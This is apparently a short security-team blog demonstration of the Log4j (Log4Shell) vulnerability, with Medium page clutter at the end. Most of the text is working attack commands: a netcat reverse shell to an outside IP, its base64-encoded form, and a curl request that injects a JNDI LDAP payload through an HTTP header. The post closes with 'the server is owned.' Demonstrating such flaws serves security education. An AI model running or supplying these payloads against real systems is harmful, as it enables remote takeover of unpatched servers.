Log4j Demonstration

vulnerable server
vulnerable server
malicious ldap server
malicious ldap server
listening for remote shell
netcat listener
ldap://127.0.0.1:1389/Basic/Command/Base64/[base64_encoded_cmd]
nc 3.86.225.135 4444 -e /bin/sh
base64 encode the remote shell command
curl 52.23.211.253:8080 -H 'X-Api-Version: ${jndi:ldap://3.86.225.135:1389/Basic/Command/Base64/bmMgMy44Ni4yMjUuMTM1IDQ0NDQgLWUgL2Jpbi9zaA==}' 
launching the attack
launching the attack
errors the vulnerable server
command received
received the command
profit
Profit! the server is owned.
ref: https://www.lunasec.io/docs/blog/log4j-zero-day/

--

--

--

VXRL Team is founded by group of enthusiastic security researchers, providing information security services and contribute to the community. https://www.vxrl.hk

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

Chaos Communication Congress 36C3

Daily Report, September 23

The UTU Roadmap Update — February 2021

How to sell, send, and receive your HNT tokens on Crypto.com

{UPDATE} Calle Bici Raza Carretera 3D Hack Free Resources Generator

What is Google Fi, and How does it Work

IoT Security: Basics & Security Practices

Deleted data stored permanently on Instagram? Facebook Bug Bounty 2020

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
VXRL

VXRL

VXRL Team is founded by group of enthusiastic security researchers, providing information security services and contribute to the community. https://www.vxrl.hk

More from Medium

The Power of Pair Hacking

The Confusing Entry into Cyber Security

John knows all your passwords!!

Phishing Attacks Getting Sneakier Towards The End Of 2021

Phishing Attacks Getting Sneakier Towards The End Of 2021